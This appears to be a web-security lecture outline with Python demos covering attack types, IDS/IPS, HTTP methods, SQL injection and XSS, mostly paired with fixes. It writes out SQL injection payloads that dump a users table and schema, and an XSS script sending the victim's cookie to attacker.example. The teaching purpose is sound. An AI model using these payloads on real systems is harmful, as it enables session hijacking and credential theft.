1-Vulnerabilities 2-Hackers 3-Categories of attacks 4-What a malicious hacker do? 5-Security mechanisms 6-HTTP Web Servers 7-Web applications attacks.

Outline
1- Vulnerabilities
2- Hackers
3- Categories of attacks
4- What does a malicious hacker do?
5- Security mechanisms
6- HTTP web servers
7- Web application attacks
8- Packages
9- References

Vulnerabilities
A vulnerability is a weakness that allows an attacker to gain access to a system or its information.
Vulnerability types:
Technological
- TCP/IP protocol weaknesses (ARP spoofing, session hijacking)
- OS weaknesses
- Network equipment (routers, firewalls)
Configuration
- Unsecured user accounts
- Easily guessed user passwords
- Unsecured default settings for an application
- Misconfigured network devices
Security policy
- Lack of a written policy
- Software/hardware installation and changes that do not follow the policy
- No disaster recovery plan
Software bugs

Hackers
Black hats: individuals with computing skills who carry out malicious or destructive activities; also known as crackers.
White hats: individuals with hacking skills used for defensive purposes; also known as security analysts.
Gray hats: individuals who work both offensively and defensively.
Script kiddies: users with little or no hacking knowledge who download ready-made hacking utilities to launch attacks.
Hacktivists: hackers with political motivations.

Categories of attacks
Passive attacks
- No traffic is sent by the attacker, so they are difficult to detect
- Example: packet capturing (snooping) with a sniffer such as Wireshark
Active attacks
- The attacker must send traffic, so they are easier to detect
- Can access classified information
- Can modify data on a system

What does a malicious hacker do?
1. Reconnaissance: gather information about the targeted hosts/networks
2. Scanning: identify active hosts and open ports
3. Gaining access: log in to the host/network
4. Maintaining access: install a backdoor or rootkit
5. Covering tracks: hide the attack from the administrator

Security mechanisms
No single access control should ever be the only one implemented: multiple layers of access control provide defense in depth, with no single point of failure.
Firewalls
- Block unwanted traffic
- Control which incoming traffic reaches the more trusted internal hosts
- Log traffic to/from the internal (private) network
- Decisions are based on an access policy (permit or deny)
Cryptography

IDS (Intrusion Detection System)
- Inspects traffic up to the application layer; host-based or network-based
- Passive device: connected off the traffic path (mirror port or tap), so it can alert but not block
- Detection is based on a signature database, so traffic that matches no signature goes unnoticed and encoded payloads must be normalized before matching

IPS (Intrusion Prevention System)
- Inspects traffic up to the application layer; host-based or network-based
- Active device: connected inline on the traffic path, so it can drop or reset malicious traffic as well as alert
- Because it is inline, a false positive blocks legitimate traffic and the device itself becomes a point of failure
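To make the signature-database idea concrete, here is an added example (not part of the original slides) of a minimal IDS-style pass over web-server access-log lines. The signature list, the log lines and the client addresses are constructed for the demo, and the log format assumed is the common Apache/nginx combined format. The second pass shows the caveat above: the same signatures miss the URL-encoded payloads when the matcher does not decode the request target first. An inline IPS would drop the matching requests instead of only alerting.

```python
"""Signature-based detection of web attacks in access-log lines, IDS style.

Added example, not from the original slides. Signatures, log lines and hosts
are constructed for the demo (not real traffic).
"""
import re
from urllib.parse import unquote_plus

# A miniature signature DB: (name, pattern applied to the decoded request target).
SIGNATURES = [
    ("sqli-tautology", re.compile(r"(?i)\bor\b\s+\d+\s*=\s*\d+")),
    ("sqli-union",     re.compile(r"(?i)\bunion\b\s+(all\s+)?select\b")),
    ("xss-script-tag", re.compile(r"(?i)<\s*script")),
    ("path-traversal", re.compile(r"\.\./")),
]

# Combined log format: ip ident user [time] "METHOD target VERSION" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample access-log lines.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2014:10:00:01 +0000] "GET /course.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [12/Mar/2014:10:00:07 +0000] "GET /course.php?id=1%20OR%201=1 HTTP/1.1" 200 4096
10.0.0.9 - - [12/Mar/2014:10:00:12 +0000] "GET /course.php?id=0%20UNION%20SELECT%20user,pass%20FROM%20users HTTP/1.1" 200 2048
10.0.0.9 - - [12/Mar/2014:10:00:20 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 300
10.0.0.9 - - [12/Mar/2014:10:00:25 +0000] "GET /static/../../etc/passwd HTTP/1.1" 404 150
"""


def match_signatures(target: str, decode: bool = True) -> list:
    """Return the names of the signatures that fire on one request target.

    With decode=True the target is URL-decoded first (the normalisation step
    a real IDS must do); with decode=False the raw bytes are matched as-is.
    """
    text = unquote_plus(target) if decode else target
    return [name for name, pattern in SIGNATURES if pattern.search(text)]


def scan_log(log_text: str, decode: bool = True) -> list:
    """IDS pass: parse each line and emit (ip, target, [signatures]) for hits.

    An IPS sitting inline would drop these requests instead of just alerting.
    """
    alerts = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue                      # not a well-formed log line, skip it
        hits = match_signatures(m["target"], decode)
        if hits:
            alerts.append((m["ip"], m["target"], hits))
    return alerts


if __name__ == "__main__":
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(ip, target, hits)
    print("alerts without URL decoding:", len(scan_log(SAMPLE_LOG, decode=False)))
```

With decoding, the four attack lines from 10.0.0.9 are flagged; without it only the unencoded `../` traversal is caught, which is exactly the evasion a signature-only IDS is exposed to.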

HTTP web servers
A web server stores, processes and delivers HTML pages (which may also carry JavaScript) to a client using the Hypertext Transfer Protocol. A page may contain text, images, scripts and style sheets. The web client (user agent) is a web browser or a web crawler.
The Web was started in 1989 by Tim Berners-Lee as a project to exchange information. The world's first web server, CERN httpd, ran on a NeXTSTEP workstation.

HTTP protocol
HTTP is based on request methods:
GET: requests data from a resource
- Name/value pairs are sent in the URL (query string)
- Can be cached
- Remains in browser history
- Can be bookmarked
- Should never be used to exchange sensitive data: the query string ends up in server logs, proxy logs, browser history and Referer headers
- Has length restrictions
- Should be used only to retrieve data
POST: submits data to be processed
- Name/value pairs are sent in the HTTP message body
- Not cached by default
- Does not remain in browser history
- Cannot be bookmarked
- No length restrictions (beyond server limits)
- A POST body is still sent in clear text on the wire; only HTTPS protects either method in transit
There are also HEAD, PUT, DELETE, OPTIONS and CONNECT, but they are out of this presentation's scope.
Cookies are used to carry data between pages on the client side; the server keeps the matching state in session files keyed by the session ID stored in the cookie.
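The GET/POST difference above, as an added worked example that is not part of the original slides: the same login form serialized both ways, a parser that recovers the pairs from either place, and a check for which fields would land in the request line (and therefore in logs, history and Referer headers). The host name, the `/login` path and the form fields are assumptions constructed for the demo; the wire format is the standard HTTP/1.1 request layout.

```python
"""GET vs POST: where form data lands in the request.

Added example, not from the original slides. Host, path and form fields are
constructed for the demo.
"""
from urllib.parse import urlencode, urlsplit, parse_qs

HOST = "www.example.com"          # assumed host for the demo
SENSITIVE_FIELDS = {"password", "passwd", "pwd", "token", "session"}


def build_request(method: str, path: str, params: dict) -> bytes:
    """Serialize an HTTP/1.1 request carrying `params` as a form submission.

    GET puts the pairs in the query string of the request line; POST puts
    the same pairs, identically encoded, in the message body.
    """
    encoded = urlencode(params)
    if method == "GET":
        request_line = f"GET {path}?{encoded} HTTP/1.1"
        headers = [f"Host: {HOST}"]
        body = b""
    elif method == "POST":
        request_line = f"POST {path} HTTP/1.1"
        body = encoded.encode()
        headers = [
            f"Host: {HOST}",
            "Content-Type: application/x-www-form-urlencoded",
            f"Content-Length: {len(body)}",
        ]
    else:
        raise ValueError("only GET and POST are modelled here")
    head = "\r\n".join([request_line, *headers]) + "\r\n\r\n"
    return head.encode() + body


def parse_request(raw: bytes) -> dict:
    """Recover method, path and submitted name/value pairs from a raw request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode()
    method, target, _version = request_line.split(" ")
    parts = urlsplit(target)
    # GET carries the form in the query string, POST in the body.
    params = parse_qs(parts.query) if method == "GET" else parse_qs(body.decode())
    return {"method": method, "path": parts.path, "params": params,
            "request_line": request_line}


def sensitive_fields_in_request_line(raw: bytes) -> list:
    """Names of sensitive fields that appear in the request line.

    Those are the values that end up in access logs, proxy logs, browser
    history and Referer headers; a POST body never reaches any of them.
    """
    info = parse_request(raw)
    if info["method"] != "GET":
        return []
    return sorted(name for name in info["params"] if name in SENSITIVE_FIELDS)


if __name__ == "__main__":
    form = {"user": "alice", "password": "s3cret"}   # constructed sample form
    for method in ("GET", "POST"):
        raw = build_request(method, "/login", form)
        print(raw.decode())
        print("leaks via request line:", sensitive_fields_in_request_line(raw))
```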

Web application attacks
- SQL injection
- Cross-site scripting (XSS)

SQL injection is a code injection technique used to attack data-driven applications: malicious SQL statements are inserted into an entry field and executed by the database. An attacker can use it to:
- Retrieve data
- Destroy data
- Change data

SQL injection steps
1- SQL: try to load a course with its ID
2- SQL: try with a modified ID
3- SQL: combine with other tables
4- SQL: retrieve the DB name
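The four steps above carried through against a small in-memory database, as an added example that is not code from the original slides. The `courses` and `users` tables, their rows and the attacker-supplied ID strings are constructed for the demo, and SQLite from the Python standard library stands in for the real database. Step 4 on the slides retrieves the DB name (on MySQL that would be `database()`); SQLite has no such function, so the example reads the schema from `sqlite_master` instead. The parameterized version at the end shows why binding the value rather than concatenating it closes every one of the four steps.

```python
"""SQL injection against a 'load course by ID' query, and the parameterized fix.

Added example, not from the original slides. Schema, rows and attacker
strings are constructed for the demo.
"""
import sqlite3


def setup_db() -> sqlite3.Connection:
    """In-memory database with constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE courses (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO courses VALUES (1, 'Web Security'), (2, 'Networks');
        INSERT INTO users VALUES (1, 'admin', 'hunter2'), (2, 'bob', 'letmein');
    """)
    return conn


def load_course_vulnerable(conn, course_id: str) -> list:
    """Builds the query by string concatenation: the user input becomes SQL."""
    sql = "SELECT id, title FROM courses WHERE id = " + course_id
    return conn.execute(sql).fetchall()


def load_course_safe(conn, course_id: str) -> list:
    """Parameterized query: the value is bound, never parsed as SQL."""
    sql = "SELECT id, title FROM courses WHERE id = ?"
    return conn.execute(sql, (course_id,)).fetchall()


# Attacker-controlled 'course ID' values, following the slide's four steps.
STEP1_NORMAL = "1"                                                  # legitimate lookup
STEP2_ALL_ROWS = "1 OR 1=1"                                         # tautology: every course
STEP3_OTHER_TABLE = "0 UNION SELECT username, password FROM users"  # combine with other tables
STEP4_SCHEMA = "0 UNION SELECT name, sql FROM sqlite_master"        # SQLite stand-in for DB name


if __name__ == "__main__":
    db = setup_db()
    for label, payload in [("normal", STEP1_NORMAL), ("all rows", STEP2_ALL_ROWS),
                           ("users table", STEP3_OTHER_TABLE), ("schema", STEP4_SCHEMA)]:
        print(f"{label:12} -> {load_course_vulnerable(db, payload)}")
    # Bound as a value, the tautology is compared as text and matches nothing.
    print("safe        ->", load_course_safe(db, STEP2_ALL_ROWS))
```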

Cross-site scripting (XSS)
XSS is the injection of JavaScript into an HTML page, delivered through either the GET or the POST method. XSS is very similar to SQL injection: in SQL injection we exploited the vulnerability by injecting SQL queries as user input; in XSS we inject code (client-side script) that the remote server includes in the pages it serves, so it executes in other users' browsers.

Types of cross-site scripting
- Non-persistent (reflected)
- Persistent (stored)

A non-persistent (reflected) attack requires the user to visit a link specially crafted by the attacker. When the user visits the link, the server reflects the injected code into its response and the user's browser executes it.

In a persistent (stored) attack, the code injected by the attacker is stored on the server (mostly in a database) and served to every user who later views the page, so the damage is greater than with a non-persistent attack. Here we will see how to hijack another user's session by performing XSS: the injected script reads the victim's session cookie and sends it to the attacker.
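Both XSS types above, and the session-hijacking payload, as one added example that is not code from the original slides. The search page, the comment board, the cookie name and the attacker's collector host (`attacker.example`) are assumptions constructed for the demo. The vulnerable renderers echo user input straight into the HTML; the fixed ones apply output encoding with `html.escape`, and the Set-Cookie helper shows the `HttpOnly` attribute that keeps `document.cookie` from exposing the session ID even when a script does run.

```python
"""Reflected and stored XSS in a tiny page renderer, with the fixes.

Added example, not from the original slides. Pages, store, cookie name and
attacker host are constructed for the demo.
"""
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed attacker payload: ships the victim's cookies to a host the
# attacker controls (hypothetical domain).
STEAL_COOKIE = ("<script>new Image().src="
                "'http://attacker.example/c?'+document.cookie</script>")


def crafted_link(base_url: str, payload: str) -> str:
    """The link an attacker sends to a victim (reflected XSS delivery)."""
    return base_url + "?q=" + quote(payload)


def search_page_vulnerable(url: str) -> str:
    """Reflected XSS: the 'q' parameter is echoed straight into the HTML,
    so a crafted link runs the attacker's script in the visitor's browser."""
    q = parse_qs(urlsplit(url).query).get("q", [""])[0]
    return f"<h1>Results for: {q}</h1>"


def search_page_safe(url: str) -> str:
    """Same page with output encoding: <, >, &, " and ' become entities."""
    q = parse_qs(urlsplit(url).query).get("q", [""])[0]
    return f"<h1>Results for: {html.escape(q, quote=True)}</h1>"


class CommentBoard:
    """Stored XSS: comments persist in the store and are served to every
    later visitor, so one injected script reaches all of them."""

    def __init__(self, escape_output: bool):
        self.escape_output = escape_output
        self.comments = []           # stands in for the database

    def post(self, author: str, text: str) -> None:
        self.comments.append((author, text))

    def render(self) -> str:
        rows = []
        for author, text in self.comments:
            if self.escape_output:   # the fix: encode on output, every time
                author, text = html.escape(author, True), html.escape(text, True)
            rows.append(f"<li><b>{author}</b>: {text}</li>")
        return "<ul>" + "".join(rows) + "</ul>"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie with HttpOnly so document.cookie cannot read the session ID;
    Secure and SameSite limit where the browser will send it."""
    return (f"Set-Cookie: SESSIONID={session_id}; Path=/; "
            "HttpOnly; Secure; SameSite=Lax")


def contains_live_script(rendered_html: str) -> bool:
    """Crude check used by this demo: does a real <script> tag survive?"""
    return "<script" in rendered_html.lower()


if __name__ == "__main__":
    link = crafted_link("http://shop.example/search", STEAL_COOKIE)
    print(search_page_vulnerable(link))      # script tag survives
    print(search_page_safe(link))            # rendered as harmless text
    board = CommentBoard(escape_output=False)
    board.post("mallory", STEAL_COOKIE)
    print(board.render())                    # every visitor gets the script
    print(session_cookie_header("abc123"))
```

Escaping stops the script from being parsed as markup; `HttpOnly` is the second layer, so that a script which does get through (via some other injection point) still cannot read the session ID and complete the hijack.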

Packages
1- Burp Suite Free v1.5
2- sqlmap
3- Nikto
4- Nessus
5- Google dorks
6- Web crawlers (HTTrack, Wget)
7- WebScarab (HTTP traffic interception)